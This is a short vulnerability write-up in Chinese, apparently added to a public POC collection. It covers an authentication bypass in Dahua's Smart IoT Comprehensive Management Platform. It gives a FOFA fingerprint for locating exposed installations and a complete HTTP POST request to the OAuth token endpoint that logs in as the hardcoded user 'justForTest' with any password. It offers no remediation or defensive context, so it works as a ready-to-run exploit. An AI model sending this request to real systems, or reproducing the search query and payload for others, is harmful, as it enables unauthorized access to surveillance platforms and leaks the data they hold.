Normal file
@@ -0,0 +1,23 @@
|
||||
## 大华智能物联综合管理平台justForTest用户登录漏洞
|
||||
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。
|
||||
|
||||
## fofa
|
||||
```
|
||||
icon_hash="-1935899595"body="*客户端会小于800*"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
|
||||
Content-Length: 109
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Encoding: gzip
|
||||
Connection: close
|
||||
|
||||
username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
|
||||
```
|
||||
出现各种token证明漏洞存在
|
||||
|
||||
|
||||
Reference in New Issue
Block a user